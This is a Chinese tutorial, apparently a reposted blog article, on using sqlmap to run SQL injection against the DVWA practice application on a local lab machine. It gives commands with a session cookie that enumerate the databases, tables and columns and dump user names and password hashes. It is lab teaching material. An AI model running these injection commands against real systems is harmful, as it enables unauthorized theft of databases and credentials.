使用Sqlmap对dvwa进行sql注入测试(初级阶段)

0.测试准备

1)打开Kali虚拟机终端;
在这里插入图片描述
2)打开靶机OWASP,并通过浏览器,输入IP地址进入dvwa的主页,然后选择SQL injection进入SQL注入的测试页面
在这里插入图片描述在这里插入图片描述在这里插入图片描述

1.获取DVWA的url和cookie

在输入框中输入1,显示有内容,此时利用此URL进行SQL注入。
输入document.cookie获取页面的cookie。去除remem_token字段的内容,用于下文的sql注入终端的cookie。
在这里插入图片描述

3.在终端开始测试

1)终端中输入指令一:
sqlmap -u"http://192.168.134.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie “security=low; PHPSESSID=lcph9vq217i7bkio8piu6h5td2” --dbs
在这里插入图片描述结果如下,说明找到了连个数据库dvwa和information_schema,接下来获取数据库dvwa 中的表格。
在这里插入图片描述2)在终端中输入指令二:
sqlmap -u"http://192.168.134.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie “security=low; PHPSESSID=lcph9vq217i7bkio8piu6h5td2” -D dvwa --tables
在这里插入图片描述结果如下,发现有两个表格,guestbook和users,接下来获取users数据表中有哪些列。
在这里插入图片描述3)在终端中输入指令三:
sqlmap -u"http://192.168.134.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie “security=low; PHPSESSID=lcph9vq217i7bkio8piu6h5td2” -D dvwa -T users --columns
在这里插入图片描述结果如下,说明users一共有六列,接下来获取具体内容
在这里插入图片描述
4)在终端中输入指令四,有提示信息则输入y:
sqlmap -u"http://192.168.134.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie “security=low; PHPSESSID=lcph9vq217i7bkio8piu6h5td2” -D dvwa -T users --dump
在这里插入图片描述结果如下,表格中的数据即显示。
在这里插入图片描述5)若数据库中数据较多,可在终端中输入指令五,只输出用户名和密码字段:
sqlmap -u"http://192.168.134.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie “security=low; PHPSESSID=lcph9vq217i7bkio8piu6h5td2” -D dvwa -T users -C “user,password” --dump

在这里插入图片描述
结束!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/452735.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

什么是软件生命周期

什么是软件生命周期

软件生命周期又称为软件生存周期或系统开发生命周期,是软件的产生直到报废的生命周期,周期内有问题定义、可行性分析、总体描述、系统设计、编码、调试和测试、验收与运行、维护升级到废弃等阶段,这种按时间分程的思想方法是软件工程中的一种…
阅读更多...
STL中map和string, vector 用法详解

STL中map和string, vector 用法详解

1. map 用法详解 std map是STL的一个关联容器,它提供一对一(其中第一个可以称为关键字,每个关键字只能在map中出现一次,第二个可能称为该关键字的值)的数据处理能力,由于这个特性,它完成有可能…
阅读更多...
如果备份还原SecureCRT、Xshell远程工具远程

如果备份还原SecureCRT、Xshell远程工具远程

因为有时候电脑操作系统要重新安装,需要将远程备份下来。或者要将远程发给其他同事。一、如何备份还原SecureCRT远程1、打开options-global options---general---configuration paths找到配置文件保存路径,如下图:2、打开C:\Users\NUC\AppDat…
阅读更多...
Centos7 下yum安装mysql

Centos7 下yum安装mysql

转载于:https://www.cnblogs.com/nbjjy/p/9023991.html
阅读更多...
Python协程--迭代器

Python协程--迭代器

0. 实现一个可以迭代的对象 1)要想使一个对象实现迭代的功能,须实现__iter__和__next__方法。 2)判断classmate是否是可以迭代的对象: from collections import Iterable isinstance(classmate, Iterable)结果为True则说明是可以…
阅读更多...
什么是敏捷开发

什么是敏捷开发

什么是敏捷开发? 敏捷开发(Agile Development)是一种以人为核心、迭代、循序渐进的开发方法。 怎么理解呢?首先,我们要理解它不是一门技术,它是一种开发方法,也就是一种软件开发的流程,它会指导我们用规定的…
阅读更多...
May 18:PHP 输出语句

May 18:PHP 输出语句

通过前面的学习了解了php的基本语法,今天向大家简单介绍php的几种输出方式: 1. echo 常用的输出语句,例如:echo helloworld!; 2. print() 输出语句,有返回值。例如:print(helloworld&#x…
阅读更多...
SendMessage、PostMessage原理和源代码详解

SendMessage、PostMessage原理和源代码详解

本文讲解SendMessage、PostMessage两个函数的实现原理,分为三个步骤进行讲解,分别适合初级、中级、高级程序员进行理解,三个步骤分别为: 1、SendMessage、PostMessage的运行机制。 2、SendMessage、PostMessage的运行内幕。 3、…
阅读更多...
Python协程--实现斐波那契数列(Fibonacci)的几种方式

Python协程--实现斐波那契数列(Fibonacci)的几种方式

1.使用for遍历list数组 # 使用for遍历list数组 nums list() a 0 b 1 i 0while i < 10:nums.append(a)a, b b, abi 1for num in nums:print(num)2.使用迭代器完成 class Fibonacci(object):def __init__(self, all_num):self.all_num all_numself.current_num 0sel…
阅读更多...
敏捷开发宣言

敏捷开发宣言

敏捷开发宣言&#xff1a; 1. 个体和交互胜过过程和工具 2. 可工作的软件胜过面面俱到的文档 3. 客户协作胜过合同谈判 4. 响应变化胜过遵循计划 从上面的宣言可以看出&#xff0c;敏捷开发的核心是人 、协作、时刻可运行的软件、变化。
阅读更多...
java fast math,Java FastMath.signum方法代码示例

java fast math,Java FastMath.signum方法代码示例

import org.apache.commons.math3.util.FastMath; //导入方法依赖的package包/类/*** {inheritDoc}*/Overrideprotected double doSolve()throws TooManyEvaluationsException,NoBracketingException {double min getMin();double max getMax();// [x1, x2] is the bracketin…
阅读更多...
什么是可行性研究

什么是可行性研究

1.并非任何问题都有简单明显的解决办法&#xff0c;事实上&#xff0c;许多问题不可能在预定的系统规模或时间期限之内解决。2.如果问题没有可行的解&#xff0c;那么花费在这项工程上的任何时间、人力、软硬件资源和经费&#xff0c;都是无谓的浪费。3.可行性研究的目的&#…
阅读更多...
FTP服务的简介和配置详解

FTP服务的简介和配置详解

FTP服务的简介和配置详解注意&#xff1a;配置FTP服务时&#xff0c;最好关闭防火墙和selinux1、FTP服务简介FTP 是File Transfer Protocol&#xff08;文件传输协议&#xff09;的英文简称&#xff0c;而中文简称为“文件传输协议”。用于Internet上的控制文件的双向传输。同时…
阅读更多...
Python协程--生成器(通过异常来判断生成器已经结束)

Python协程--生成器(通过异常来判断生成器已经结束)

以实现斐波那契数列为例&#xff1a; def create_num(all_num):a, b 0, 1current_num 0while current_num < all_num:yield a # 如果一个函数中有yield语句&#xff0c;那么这个就不在是函数&#xff0c;而是一个生成器的模板a, b b, abcurrent_num 1return "ok.…
阅读更多...
四种类型转换 cast

四种类型转换 cast

1.static_cast 2.dynamic_cast 3.const_cast 4. reinterpret_cast 例子1&#xff1a; float x; cout<<static_cast<int>(x); ... f(static_cast<string>("hello")); 例子2&#xff1a; class Car; class Cabriolet:pbulic Car { …
阅读更多...
java获取不重复订单号,Java 生成永不重复的订单号

java获取不重复订单号,Java 生成永不重复的订单号

package com.taiping.test;import java.text.SimpleDateFormat;import java.util.Date;import java.util.Random;public class Test12 {/*** 生成永不重复的订单号* param startLetter 订单号开头字符串* param size 订单号中随机的大写字母个数* return*/public static String…
阅读更多...
CSS中position属性(abusolute | relative | static | fixed)区别

CSS中position属性(abusolute | relative | static | fixed)区别

关于css3中position属性的定义&#xff1a; 转载于:https://www.cnblogs.com/tangjiao/p/9025934.html
阅读更多...
什么是系统流程图

什么是系统流程图

系统流程图是概括地描绘物理系统的传统工具。它的基本思想是用图形符号以黑盒子的形式描绘组成系统的每个部件&#xff08;程序&#xff0c;文档&#xff0c;数据库&#xff0c;人工过程等&#xff09;。系统流程图表达的是数据在系统各部件之间流动的情况&#xff0c;而不是对…
阅读更多...
Python协程--生成器(实现多任务)

Python协程--生成器(实现多任务)

0.生成器 1.使用yield完成多任务 import timedef task_1():while True:print("---1----")time.sleep(0.1)yielddef task_2():while True:print("---2----")time.sleep(0.1)yielddef main():t1 task_1()t2 task_2()# 先让t1运行一会&#xff0c;当t1中遇…
阅读更多...
技术分享连载(六十一)

技术分享连载(六十一)

资源管理 Q1&#xff1a;Unity5.4.1中&#xff0c;我将需要的Shader打到一个AssetBundle包中&#xff08;包含一个关联了所有Shader的Shader Variants&#xff09;&#xff0c;分别用Shader.WarmupAllShaders和ShaderVariantCollection.WarmUp两种方式进行预加载&#xff0c;后…
阅读更多...
最新文章

Copyright @ 2022~2023